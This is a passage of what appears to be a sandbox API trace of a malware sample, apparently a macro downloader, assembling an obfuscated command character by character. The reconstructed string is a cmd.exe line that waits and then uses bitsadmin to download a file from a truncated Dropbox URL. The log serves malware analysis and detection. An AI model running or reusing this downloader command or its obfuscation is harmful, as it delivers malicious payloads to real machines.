cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.141] VarBstrCat (in: bstrLeft="d /prio", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /prior", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priori", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priorit", bstrRight="y", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority ", bstrRight="n", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority n", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority no", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority nor", bstrRight="m", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority norm", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.142] VarBstrCat (in: bstrLeft="d /priority norma", bstrRight="l", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal ", bstrRight="h", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal h", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal ht", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal htt", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal http", bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal https", bstrRight=":", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal https:", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal https:/", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal https://", bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.143] VarBstrCat (in: bstrLeft="d /priority normal https://w", bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /downloa", bstrRight="d /priority normal https://ww", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.144] SafeArrayAllocData (psa=0x7818170) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.144] VarBstrCat (in: bstrLeft=0x0, bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w", bstrRight=".", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797ba28, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf88, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.d", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.dr", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.dro", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.drop", bstrRight="b", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.dropb", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.144] VarBstrCat (in: bstrLeft="w.dropbo", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox", bstrRight=".", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.", bstrRight="c", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.c", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.co", bstrRight="m", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com/", bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com/s", bstrRight="/", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="7") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com/s/", bstrRight="7", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com/s/7", bstrRight="b", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="<", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="<\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com/s/7b", bstrRight="9", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="3") returned 1 [0017.145] VarBstrCat (in: bstrLeft="w.dropbox.com/s/7b9", bstrRight="3", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="3") returned 1 [0017.146] VarBstrCat (in: bstrLeft="w.dropbox.com/s/7b93", bstrRight="3", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.146] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://ww", bstrRight="w.dropbox.com/s/7b933", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.146] SafeArrayAllocData (psa=0x7818370) returned 